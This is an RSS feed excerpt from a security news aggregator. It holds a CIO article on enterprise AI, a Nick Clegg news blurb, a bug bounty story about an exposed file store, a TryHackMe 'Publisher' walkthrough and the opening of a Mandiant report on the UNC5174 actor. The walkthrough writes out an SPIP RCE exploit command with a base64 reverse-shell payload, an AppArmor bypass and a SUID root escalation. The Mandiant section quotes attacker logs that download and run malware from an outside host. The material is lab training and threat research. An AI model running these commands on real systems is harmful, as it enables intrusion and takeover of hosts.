<p>“As a CIO today, my most strategically important initiative is scaling artificial intelligence from pockets of experimentation into a core, trusted capability embedded in how the enterprise operates,” he says. “At MetLife, we view AI not as a standalone technology effort, but as a critical enabler of our strategy. It helps us sharpen decisions, simplify work, and ultimately deliver better outcomes for our customers and the business.”</p>



<p>To do all that, MetLife deployed MetIQ, an internal composite AI platform, that “allows teams to experiment, build, and deploy AI solutions in a secure, governed environment.” Nadgauda says the platform provides the company “the flexibility to adapt to rapidly evolving technologies while maintaining strong controls around data, privacy, and risk.”</p>



<p>Nadgauda’s IT team is also integrating AI into employee tools and processes, “so it becomes a thought partner that supports decisions earlier in the process, not just after the fact,” he explains.</p>



<p>IT is also “intentionally designing AI experiences, tools, and training that align to how people work in their roles,” Nadgauda says, noting that the organization gets “meaningful adoption” when employees see AI’s relevance to their day-to-day work.</p>



<p>All this, he adds, has made AI “a natural part of how work actually gets done across engineering, operations, and customer-facing teams.”</p>



<p>Like others, Nadgauda sees such work as evidence that the CIO’s role itself has become that strategic partner it has long aimed to be.</p>



<p>“It’s about shaping how the enterprise operates in a world where technology and business are fully intertwined. We need to always think about how we are making it easier for the business to move faster, make better decisions, and deliver stronger outcomes for customers,” he says.</p>



<h2 class="wp-block-heading">Agentic AI becomes a priority</h2>



<p>Likewise, <a href="https://www.linkedin.com/in/janardhan-santhanam-b57a2a7/" rel="nofollow">Janardhan Santhanam</a>, CIO of Tata Consultancy Services, considers transformation of the business as the strategic imperative for IT. Santhanam is using agentic AI to drive that. In the State of the CIO survey, 38% of respondents listed agentic AI as a strategically important tech initiative.</p>



<p>“Our most important initiative is redefining how our work gets done as an agentic enterprise,” he says, adding that the goal is to unlock “durable, nonlinear performance gains critical to our organization’s growth.”</p>



<p>As is the case with other CIOs, Santhanam has expanded his focus beyond IT infrastructure and even the IT realm to the whole organization to ensure success.</p>



<p>“In our view, this entails creating an AI-first culture amongst our workforce and resetting the operating model of internal functions and internal IT to one of ‘agents + apps + humans’ working together on intelligent decision‑making and autonomous execution,” he explains. “We have not just democratized AI infrastructure in the hands of all but also distributed agency to create 2x workers and teams.”</p>



<p>Furthermore, IT is reinventing processes across business departments to support desired business outcomes and add speed. Santhanam describes this work as creating “function-as-a-platform at scale.”</p>



<p>Reflecting another top strategic IT initiative identified in the State of the CIO survey, Santhanam stresses that IT has also prioritized security, privacy, and compliance as it advances its AI agenda.</p>



<p>Nearly all organizations have high hopes for agentic AI. An <a href="https://www.genpact.com/insight/autonomy-requires-trust-in-ai" rel="nofollow">April 2026 study from HFS Research and Genpact</a> found that 92% of surveyed executives believe agentic AI will fundamentally change how work is executed.</p>



<p>That has put pressure on CIOs to move forward with it, says <a href="https://www.fticonsulting.com/experts/ozgur-vural" rel="nofollow">Oz Vural</a>, senior managing director of FTI Consulting.</p>



<p>“IT must move to agentic AI that can execute workflows and make real-time decisions within guardrails,” Vural says, noting that this is an opportunity for CIOs to contribute to increased revenue and EBITA “rather than just saving hours with automation.”</p>



<p>That is shifting a metric of CIO success to how quickly they deliver “time to intelligence,” he adds.</p>



<h2 class="wp-block-heading">A holistic perspective on IT initiatives</h2>



<p>CIOs, however, are hitting roadblocks on that quest.</p>



<p>Legacy tech, immature data programs, and skills gaps are stymying CIO ambitions around agentic AI and their other top initiatives, Vural says.</p>



<p>Such challenges reinforce the need for CIOs to continue prioritizing fundamental IT work, says <a href="https://www.linkedin.com/in/diane-carco-2704654/" rel="nofollow">Diane M. Carco</a>, president and CEO of consulting firm Swingtide.</p>



<p>“In our time of rapidly developing technologies, I think the most strategically important initiative is clearing out the old to make way for the new,” Carco says. “Reducing technical debt by getting rid of shelfware and outdated, nonstandard systems is probably the most strategically sound and impactful thing a CIO can do to eliminate waste and improve customer satisfaction. Once that is done, plotting the right course of action for AI implementation is next.”</p>



<p>CIOs seem to agree on the importance of foundational IT work, as the State of the CIO Survey found that application modernization and cloud management were both cited as a strategic initiative by 20% of respondents, with infrastructure management cited by 17% and cloud infrastructure by 16%.</p>



<p>Given that such foundational technology initiatives are instrumental to those involving AI and leading-edge technologies, <a href="https://www.linkedin.com/in/rickikoinig/?locale=en" rel="nofollow">Ricki J Koinig</a>, CIO of the Wisconsin Department of Natural Resources, says she doesn’t segregate some as strategic and others as not.</p>



<p>“I believe the most strategically important priorities for a CIO are often the ones that are not branded as standalone projects but instead underpin everything the organization does. In my view, three such initiatives are foundational to sustained success: innovation readiness, embedded cybersecurity, and organizational readiness,” she explains.</p>



<p>For Koinig, innovation readiness has become a defining capability. “Being ‘ready’ is no longer about keeping your asset management up-to-date or adopting a specific technology; it’s about continuously raising the bar of foundational work, including maintaining high-quality, governed data, ensuring collaboration, relevant input, and transparency in decision-making throughout key stakeholder layers, and sustaining operational discipline across systems and processes,” she says.</p>



<p>“Innovation readiness also requires a deliberate commitment to managing technical debt, routinely assessing the health of the technology landscape, and making conscious efforts to provide appropriate skills and capacity to move on actual mitigations,” she adds.</p>



<p>Meanwhile, cybersecurity “must evolve from a perceived constraint into an embedded capability within all functions — business as well as IT,” Koinig notes. It involves embedding best practices and requirements throughout the various units. “When done well, cybersecurity becomes organizational muscle memory that is intuitive, proactive, and inseparable from how work gets done, regardless of role.”</p>



<p>And then there’s organizational readiness — readiness for change, in particular.</p>



<p>“Innovation cannot take hold in environments that are culturally resistant or operationally unprepared to evolve,” Koinig says, noting that leaders must “intentionally cultivate a culture that embraces change as a constant, not a disruption, while aligning talent strategies to support that mindset.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Silicon Valley including Meta has embraced Maga politics, says Nick Clegg]]></title>
<description><![CDATA[Meta’s former head of global affairs says executives pivoted right in some cases for ‘rather more self-interested’ reasonsSilicon Valley companies including Meta have decided to embrace Maga politics, some for “rather more self-interested” reasons, the former UK deputy prime minister Nick Clegg h...]]></description>
<link>https://tsecurity.de/de/3580397/ai-nachrichten/silicon-valley-including-meta-has-embraced-maga-politics-says-nick-clegg/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580397/ai-nachrichten/silicon-valley-including-meta-has-embraced-maga-politics-says-nick-clegg/</guid>
<pubDate>Mon, 08 Jun 2026 06:02:51 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Meta’s former head of global affairs says executives pivoted right in some cases for ‘rather more self-interested’ reasons</p><p>Silicon Valley companies including Meta have decided to embrace Maga politics, some for “rather more self-interested” reasons, the former UK deputy prime minister Nick Clegg has said.</p><p>Clegg, who spent nearly seven years at Meta as the head of global affairs, told The Rest is Money podcast that it felt like “a very good time for me to move on” when he left the company in March 2025, three months into the second Trump administration.</p> <a href="https://www.theguardian.com/politics/2026/jun/08/silicon-valley-meta-maga-politics-nick-clegg">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sensitive Information Disclosure Through an Exposed File Repository.]]></title>
<description><![CDATA[By kjuliusIntroduction.One of the things I enjoy most about bug bounty hunting is how often seemingly minor findings turn into legitimate security issues. Sometimes you don’t need advanced exploitation techniques, complex chains, or zero-days. A simple directory discovery scan can reveal somethin...]]></description>
<link>https://tsecurity.de/de/3579535/hacking/sensitive-information-disclosure-through-an-exposed-file-repository/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579535/hacking/sensitive-information-disclosure-through-an-exposed-file-repository/</guid>
<pubDate>Sun, 07 Jun 2026 16:53:53 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*IZGo4zXUA82JTyeFL_Gwhw.png"><figcaption>By kjulius</figcaption></figure><h3>Introduction.</h3><p>One of the things I enjoy most about bug bounty hunting is how often seemingly minor findings turn into legitimate security issues. Sometimes you don’t need advanced exploitation techniques, complex chains, or zero-days. A simple directory discovery scan can reveal something that was never intended to be publicly accessible.</p><p>In this article, I’ll walk through a finding that started with a routine content discovery exercise and ended with an accepted medium-severity vulnerability report and a bounty reward.</p><h3>Starting With a Single Subdomain.</h3><p>During a bug bounty assessment, I was exploring an in-scope subdomain belonging to the target program. Like I usually do when approaching a new asset, I began with basic reconnaissance and content discovery.</p><p>There’s a reason experienced hunters spend so much time enumerating and fuzzing endpoints. Organizations often secure the applications everyone knows about, but forgotten directories, legacy services, and abandoned resources frequently slip through the cracks.</p><p>For this target, I launched <a href="https://github.com/ffuf/ffuf">ffuf</a> using a <a href="https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/raft-medium-directories.txt">raft-medium-sized</a> wordlist and let it do its thing.</p><blockquote>Command used.<br>ffuf -u https://subdomain.target.com -w raft-medium-directory.txt -mc 200,301,302 -fs 0</blockquote><p>At first, the results looked fairly ordinary. Most of the responses were either expected directories or redirections. Then one particular endpoint caught my attention:</p><p>/files</p><p>The response size looked interesting enough to warrant a closer look.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*J_Tpp_apccLc5tUiMz4HCw.png"><figcaption>Proof of Concept Image.</figcaption></figure><h3>The Unexpected Discovery.</h3><p>Naturally, I opened the endpoint in my browser.</p><p>Instead of receiving a 403 Forbidden response or being redirected to a login page, I was presented with something entirely different.</p><p>A file repository.</p><p>The page appeared to be powered by a secure, enterprise-grade remote access and control solution used by IT help desks and customer support teams, and displayed a list of files available for viewing and download. Executables, ZIP archives, configuration files, batch scripts, and other resources were all sitting there in plain sight.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*KL647A34L3FbvEE4f17bHg.png"><figcaption>Proof of Concept Image.</figcaption></figure><p>My first thought was simple:</p><p>“Should this really be accessible to everyone?”</p><p>The more I looked at it, the more unusual it seemed. This wasn’t a public download portal. It looked more like a support-related file store that had somehow ended up exposed to the internet.</p><p>And perhaps most importantly, there was no authentication required.</p><p>Anyone who discovered the endpoint could access it.</p><h3>Looking Beyond the Files.</h3><p>One mistake many researchers make is focusing only on whether they can find passwords, API keys, or other obvious secrets.</p><p>While those findings are certainly impactful, information disclosure vulnerabilities often provide value in less direct ways.</p><p>Even when files do not contain sensitive credentials, exposed repositories can reveal a surprising amount of information about an organization’s environment.</p><p>Installers can reveal software in use.</p><p>Configuration files can expose deployment details.</p><p>Support resources can provide attackers with intelligence that helps them understand internal workflows.</p><p>In some cases, such information can even be leveraged for social engineering attacks.</p><p>From a security perspective, the bigger issue was not necessarily the contents of a specific file — it was the fact that a repository intended for a limited audience appeared to be publicly accessible.</p><h3>Putting Together the Report.</h3><p>After documenting the endpoint and gathering screenshots, I prepared a report explaining the exposure and its potential impact.</p><p>The report focused on the lack of access controls surrounding the file store and the information disclosure risks associated with unrestricted access.</p><p>I included:</p><ul><li>The vulnerable endpoint.</li><li>Evidence showing public accessibility.</li><li>Screenshots of the exposed file listing.</li><li>A discussion of the security implications.</li><li>Recommendations for restricting access.</li></ul><p>Once everything was documented, I submitted the report and waited.</p><p>As every bug bounty hunter knows, that’s often the hardest part.</p><h3>The Verdict.</h3><p>A few days later, I received an update from the program.</p><p>The report had been reviewed and validated.</p><p>The security team agreed that the exposed file repository represented a legitimate security issue, and the finding was ultimately classified as a Medium Severity vulnerability.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lCHY8onxx1GknDGPoFNIww.png"><figcaption>Proof of Concept Image.</figcaption></figure><p>Even better, the report qualified for a bounty reward.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*TysdPU9Jr2SHtyF4FuK4kQ.png"><figcaption>Proof of Concept Image.</figcaption></figure><h3>Why This Finding Matters</h3><p>What makes this discovery memorable isn’t its technical complexity.</p><p>There was no authentication bypass.</p><p>No privilege escalation.</p><p>No remote code execution.</p><p>No elaborate vulnerability chain.</p><p>Instead, the finding serves as a reminder that effective reconnaissance remains one of the most powerful skills in bug bounty hunting.</p><p>Many researchers rush toward complex attack techniques while overlooking the basics. Yet time and time again, simple content discovery uncovers forgotten assets that organizations never intended to expose.</p><p>Sometimes the difference between finding nothing and finding a valid vulnerability is simply taking the time to investigate an interesting response.</p><h3>Lessons Learned.</h3><p>This experience reinforced a few important lessons for me.</p><p>First, never underestimate directory fuzzing. Even mature organizations can accidentally expose resources that should remain private.</p><p>Second, don’t immediately dismiss information disclosure findings. Not every vulnerability needs to leak credentials to create risk.</p><p>Third, when something feels out of place, investigate further. The /files endpoint could have easily been ignored as just another directory discovered during fuzzing.</p><p>Instead, it turned out to be the source of a valid bug bounty report.</p><h3>Final Thoughts.</h3><p>Bug bounty hunting often rewards persistence more than complexity.</p><p>This finding began with a single subdomain, a standard FFUF scan, and a bit of curiosity. What seemed like an ordinary directory discovery eventually became an accepted medium-severity report and a bounty payment.</p><p>The next time you’re running content discovery against a target, remember that hidden directories are hidden for a reason. Most will lead nowhere. Some will lead to dead ends.</p><p>And every once in a while, one of them will lead to a vulnerability worth reporting.</p><h3>💬 Before You Go.</h3><p><em>This finding is a reminder that effective reconnaissance doesn’t always require advanced techniques. Sometimes, a simple content discovery scan is enough to uncover assets that were never intended to be publicly accessible.</em></p><p><em>The next time you’re fuzzing a target, don’t rush past an interesting response. Take a closer look, investigate further, and understand the context. Hidden directories often tell stories that the main application doesn’t.</em></p><p><em>Thanks for reading. If you enjoyed this write-up, feel free to leave some claps👏, follow for more bug bounty stories, reconnaissance techniques, and real-world security findings. See you in the next writeup, peace… 🙏</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=9e7cfb74fff6" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/sensitive-information-disclosure-through-an-exposed-file-repository-9e7cfb74fff6">Sensitive Information Disclosure Through an Exposed File Repository.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[SPIP RCE + Docker SUID Escape | THM Publisher]]></title>
<description><![CDATA[Hello Friend,Welcome to another TryHackMe challenge PublisherStep 1 — Nmap ReconnaissanceWe begin with an aggressive Nmap scan to identify open ports and running services on the target machine.Nmap ResultThe HTTP title reveals SPIP CMS is running — this is a known vulnerable CMS. Version enumerat...]]></description>
<link>https://tsecurity.de/de/3579532/hacking/spip-rce-docker-suid-escape-thm-publisher/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579532/hacking/spip-rce-docker-suid-escape-thm-publisher/</guid>
<pubDate>Sun, 07 Jun 2026 16:53:49 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello Friend,</p><p>Welcome to another TryHackMe challenge <a href="https://tryhackme.com/room/publisher"><strong>Publisher</strong></a></p><p><strong>Step 1 — Nmap Reconnaissance</strong></p><p>We begin with an aggressive Nmap scan to identify open ports and running services on the target machine.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/865/1*rvJOJSUFjbiENVuIeXWdxA.png"><figcaption>Nmap Result</figcaption></figure><p>The HTTP title reveals SPIP CMS is running — this is a known vulnerable CMS. Version enumeration is the next priority.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5XE1bs9C2N29lnxrATx4CQ.png"></figure><p><strong>Step 2 — Web Enumeration (FFUF)</strong></p><p>Navigate to the web server. The homepage shows a SPIP-based Community Magazine. We run directory fuzzing to find hidden paths.</p><pre>ffuf -u http://10.65.183.106/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/866/1*UDwJKDmHWkGGlNg7zv94YQ.png"><figcaption>Fuzzing with FUZZ to find the hidden directory and files</figcaption></figure><p><strong>Step 3 — Version Detection (Whatweb)</strong></p><p>We use WhatWeb to fingerprint the exact version of SPIP running on the target.</p><pre>whatweb http://10.65.183.106/spip</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*h7Y0W69T49386Cp0Db-bvg.png"><figcaption>version detection</figcaption></figure><p>SPIP 4.2.0 is confirmed. This version is vulnerable to <a href="https://github.com/nuts7/CVE-2023-27372">CVE -2023–27372</a> an unauthenticated remote code execution vulnerability via the oubli parameter in the password reset form. this github link contain the exploitaion code with usage.</p><p><strong>Step 4 — RCE via CVE-2023–27372</strong></p><p>We use a public Python exploit to gain initial remote code execution as www-data.</p><pre>python CVE-2023-27372.py -u http://10.64.179.228/spip -c 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzOS4yMTEvNDQ0NCAwPiYx|base64 -d&gt;shell.php'</pre><p>Confirm code execution by testing the id command via the page parameter:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/815/1*Otpg3BLEub_9UKT_49ui8A.png"><figcaption>RCE</figcaption></figure><p>We have remote code execution as www-data. Next we enumerate the system for privilege escalation paths.</p><p><strong>Step 5 — LFI &amp; system enumeration</strong></p><p>Using the RCE, we read /etc/passwd to identify users on the system.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/889/1*-K7oFCIrwwTjL9Ht5xrFaA.png"><figcaption>/etc/passwd</figcaption></figure><p>User ‘think’ exists with UID 1000 — a regular user with a home directory at /home/think. Likely has SSH access. We check if think has an exposed SSH private key:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/896/1*O4Rqc5EMqcysCMd3RoIJXA.png"><figcaption>id_rsa key found</figcaption></figure><p><strong>Step 6 — SSH Access as think</strong></p><p>Read the private key using RCE, save it locally, set permissions, and SSH in:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/639/1*KbvK_FpwrNqbk64_C1f_Mg.png"><figcaption>logged in as think user</figcaption></figure><p>think user contain the user flag in user.txt</p><p><strong>Step 7 — Privilege escaltion Enumeration</strong></p><p>Now we hunt for a path to root. We search for SUID binaries:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/548/1*okNecRWJWzNnEIs206r2PA.png"><figcaption>SUID binaries</figcaption></figure><p>in this /usr/sbin/run_conatainer is a custom binary which looks like suspicious! . We use strings to reveal what the binary executes internally:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/630/1*OJiWsPWU5gXLTFYjB3wmUQ.png"></figure><p>The SUID binary run_container calls /opt/run_container.sh — if we can write to that script, we can execute commands as root.</p><p><strong>Step 8 — SUID Escape to Root</strong></p><p>Execute run_container to understand its behavior:</p><pre>cd /opt &amp;&amp; run_container<br>List of Docker containers:<br>ID: 41c976e507f8 | Name: jovial_hertz | Status: Up 4 hours</pre><pre>OPTIONS: 1) Start  2) Stop  3) Restart  4) Create  5) Quit</pre><p><strong>Escape via Dynamic Linker : </strong>We use the dynamic linker/loader to invoke bash bypassing AppArmor restrictions</p><pre>/lib/x86_64-linux-gnu/ld-linux-x86–64.so.2 /bin/bash</pre><p>This directly invokes the dynamic linker to load /bin/bash, circumventing AppArmor profile restrictions on the container binary.</p><p><strong>Inject Shell into run_container.sh : </strong>Append a bash -p (privileged shell) command to the script, then trigger via the SUID binary</p><pre>echo 'bash -p' &gt;&gt; /opt/run_container.sh<br>run_container<br># Select option 1 (Start Container)</pre><pre>bash-5.0# whoami<br>root</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/824/1*lkgmZcPVXzaDGCMBM05IHQ.png"><figcaption>root</figcaption></figure><p>in /root/root.txt we will find the final flag.</p><p>Thank you for reading. If you wnat learn about the fuzzing read this blog</p><p><a href="https://meetcyber.net/discover-hidden-attack-surfaces-with-ffuf-fuzzing-57936859e2f4">🔍 Discover Hidden Attack Surfaces with FFUF Fuzzing</a></p><p>If this helped you, connect with me:</p><p>Twitter/X : <a href="https://x.com/cybervolt07">https://x.com/cybervolt07</a></p><p>YouTube: <a href="https://www.youtube.com/@cybervolt07">https://www.youtube.com/@cybervolt07</a></p><p>Like • Share • Subscribe for more CTF walkthroughs!</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=7a2c3640c598" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/spip-rce-docker-suid-escape-thm-publisher-7a2c3640c598">SPIP RCE + Docker SUID Escape | THM Publisher</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bringing Access Back — Initial Access Brokers Exploit F5 BIG-IP (CVE-2023-46747) and ScreenConnect]]></title>
<description><![CDATA[Written by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen

 
During the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of CVE-2023-46747 affecting F5 BIG-IP Traffic Management User Interface. Addit...]]></description>
<link>https://tsecurity.de/de/3578874/it-security-nachrichten/bringing-access-back-initial-access-brokers-exploit-f5-big-ip-cve-2023-46747-and-screenconnect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578874/it-security-nachrichten/bringing-access-back-initial-access-brokers-exploit-f5-big-ip-cve-2023-46747-and-screenconnect/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Michael Raggi, Adam Aprahamian, Dan Kelly, Mathew Potaczek, Marcin Siedlarz, Austin Larsen</p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p>During the course of an intrusion investigation in late October 2023, Mandiant observed novel N-day exploitation of <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46747" rel="noopener" target="_blank"><u>CVE-2023-46747</u></a> affecting F5 BIG-IP Traffic Management User Interface. Additionally, in February 2024, we observed exploitation of Connectwise ScreenConnect CVE-2024-1709 by the same actor. This mix of custom tooling and the SUPERSHELL framework leveraged in these incidents is assessed with moderate confidence to be unique to a People's Republic of China (PRC) threat actor, UNC5174.</p>
<p>Mandiant assesses UNC5174 (believed to use the persona "Uteus") is a former member of Chinese hacktivist collectives that has since shown indications of acting as a contractor for China's Ministry of State Security (MSS) focused on executing access operations. UNC5174 has been observed attempting to sell access to U.S. defense contractor appliances, UK government entities, and institutions in Asia in late 2023 following CVE-2023-46747 exploitation. In February 2024, UNC5174 was observed exploiting <a href="https://cloud.google.com/blog/topics/threat-intelligence/connectwise-screenconnect-hardening-remediation" rel="noopener" target="_blank"><u>ConnectWise ScreenConnect vulnerability</u></a> (<a href="https://nvd.nist.gov/vuln/detail/CVE-2024-1709" rel="noopener" target="_blank"><u>CVE-2024-1709</u></a>) to compromise hundreds of institutions primarily in the U.S. and Canada.</p>
<h2>Targeting and Timeline</h2>
<p>UNC5174 has been linked to widespread aggressive targeting and intrusions of Southeast Asian and U.S. research and education institutions, Hong Kong businesses, charities and non-governmental organizations (NGOs), and U.S. and UK government organizations during October and November 2023, as well as in February 2024.</p>
<p>The actor appears primarily focused on executing access operations. Mandiant observed UNC5174 exploiting various vulnerabilities during this time.</p>
<ul>
<li>ConnectWise ScreenConnect Vulnerability CVE-2024-1709</li>
<li>F5 BIG-IP Configuration Utility Authentication Bypass Vulnerability CVE-2023-46747</li>
<li>Atlassian Confluence CVE-2023-22518</li>
<li>Linux Kernel Exploit CVE-2022-0185</li>
<li>Zyxel Firewall OS Command Injection Vulnerability CVE-2022-30525</li>
</ul>
<p>Investigations revealed several instances of UNC5174 infrastructure, exposing the attackers' bash command history. This history detailed artifacts of extensive reconnaissance, web application fuzzing, and aggressive scanning for vulnerabilities on internet-facing systems belonging to prominent universities in the U.S., Oceania, and Hong Kong regions. Additionally, key strategic targets like think tanks in the U.S. and Taiwan were identified; however, Mandiant does not have significant evidence to determine successful exploitation of these targets.</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig1.max-1000x1000.jpg" alt="UNC5174 global targeting map">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="8pnka">Figure 1: UNC5174 global targeting map</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2>Initial Disclosure of CVE-2023-46747</h2>
<p>On Oct. 25, 2023, Praetorian published an <a href="https://www.praetorian.com/blog/advisory-f5-big-ip-rce/" rel="noopener" target="_blank"><u>advisory</u></a> and proof-of-concept (PoC) for a zero-day (0-day) vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2023-46747" rel="noopener" target="_blank"><u>CVE-2023-46747</u></a>) impacting the F5 BIG-IP Traffic Management User Interface (TMUI). This vulnerability allows an unauthenticated remote attacker to execute arbitrary commands on the BIG-IP operating system as the root user. The blog post also detailed steps required for successful exploitation, involving Apache JServ Protocol (AJP) request smuggling to create an administrative user, which can then be leveraged to execute bash commands via the F5 Traffic Management Shell (TMSH). Following the initial advisory, F5 published a security advisory on Oct. 27, 2023. The <a href="https://my.f5.com/manage/s/article/K000137353" rel="noopener" target="_blank"><u>advisory</u></a> detailed the affected F5 appliance versions and provided a script for mitigating the vulnerability. Mandiant strongly recommends organizations apply the mitigation script to vulnerable F5 BIG-IP appliances and investigate for evidence of compromise.</p>
<h2>Evidence of Exploitation</h2>
<p>Mandiant identified UNC5174 compromising F5 BIG-IP appliances, which exhibited evidence of administrative user account creation and execution of bash commands via the TMSH. Through investigation it became apparent that UNC5174 had exploited CVE-2023-46747 to perform actions on the appliance like account creation. The anomalous behavior appeared first in the "<em><strong>/var/log/audit</strong></em>" log file, which recorded evidence of the creation of new admin user accounts and bash commands executed by the newly created user via the F5's TMSH. This action also resulted in the creation of the same new user account on the underlying operating system, including the following entries:</p>
<ul>
<li><em><strong>/etc/passwd</strong></em></li>
<li><em><strong>/etc/shadow</strong></em></li>
<li>The creation of the user's home directory was also replicated at <em><strong>/home/&lt;username&gt;</strong></em>.</li>
</ul></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Oct 28 01:52:32 localhost.localdomain notice tmsh[30629]: 
01420002:5: AUDIT - pid=30629 user=root folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=create 
auth user f5support3 password **** shell bash partition-access 
add { all-partitions { role admin } }

Oct 28 01:53:29 localhost.localdomain notice icrd_child[18778]: 
01420002:5: AUDIT - pid=18778 user=f5support3 folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash -c id</code></pre>
<p><span>Table 1: Compromised host Audit log. Note the compromised appliance recorded timestamps in local time.</span></p></div>
<div class="block-paragraph_advanced"><p>The "<em><strong>/var/log/restjavad-audit.log</strong></em>" recorded evidence of malicious requests to the REST API, including user account, HTTP request method, API endpoint, and source IP address. In the following example, UNC5174 authenticated and executed bash commands on the underlying operating system as the newly created user "<em><strong>f5support3</strong></em>". The following log entries show the <em><strong>f5support3</strong></em> user executing bash commands. The body of the POST request contains the bash command being executed.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>[I][8602][27 Oct 2023 14:53:29 UTC][ForwarderPassThroughWorker] 
{"user":"local/f5support3","method":"POST","uri":"http://localhost:8100
/mgmt/tm/util/bash","status":200,"from":"154.12.177[.]8"}

[I][8603][27 Oct 2023 14:53:36 UTC][ForwarderPassThroughWorker] 
{"user":"local/f5support3","method":"PATCH","uri":"http://localhost:8100
/mgmt/shared/authz/users/f5support3","status":200,"from":"154.12.177[.]8"}
</code></pre>
<p><span>Table 2: UNC5174 bash commands with newly created username f5support3</span></p></div>
<div class="block-paragraph_advanced"><p>UNC5174 then created new accounts via the F5 TMUI, attempting to appear as legitimate F5-related user accounts, including:</p>
<ul>
<li>F5support3</li>
<li>F5_admin</li>
<li>f5_support</li>
</ul>
<h2>Post-Exploitation Tactics by UNC5174 After Successful Account Creation</h2>
<h3>SNOWLIGHT, GOHEAVY, GOREVERSE, and SUPERSHELL</h3>
<p>UNC5174 leveraged their newly minted TMSH access to download and execute "/tmp/watchsys" using a cURL command. Mandiant's analysis of the file "/tmp/watchsys" identified it as a new 64-bit ELF downloader we have named <u>SNOWLIGHT</u>.</p>
<p>The following chained bash` commands attributed to UNC5174 will perform the following actions related to SNOWLIGHT: </p>
<ol>
<li>Delete any file previously written to /tmp/watchsys.</li>
<li>Forcefully kill the process "watchsys" if it is running.</li>
<li>Download the file from a remote URL to /tmp/watchsys.</li>
<li>Modify the permissions of /tmp/watchsys to allow execution.</li>
<li>Execute /tmp/watchsys using "nohup", so that the process will continue executing after the parent process is terminated.</li>
<li>Perform a directory listing of the /tmp directory.</li>
</ol></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Nov  2 07:29:47 localhost.localdomain notice icrd_child[17602]: 
01420002:5: AUDIT - pid=17602 user=admin folder=/Common 
module=(tmos)# status=[Command OK] cmd_data=run util bash 
-c "rm -rf /tmp/watchsys;killall -9 watchsys;curl -o /tmp/watchsys 
http://172.104.124[.]74/LG;chmod 755 /tmp/watchsys;nohup 
/tmp/watchsys &amp;;ls -al /tmp/"</code></pre>
<p><span>Table 3: UNC5174 cURL command to download SNOWLIGHT downloader</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/f5-connectwise-fig2.max-1000x1000.png" alt="Excerpt showing SNOWLIGHT's decoding routine and memory injection method">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="kdtvq">Figure 2: Excerpt showing SNOWLIGHT's decoding routine and memory injection method</p></figcaption>
      
    </figure>

  
      </div>
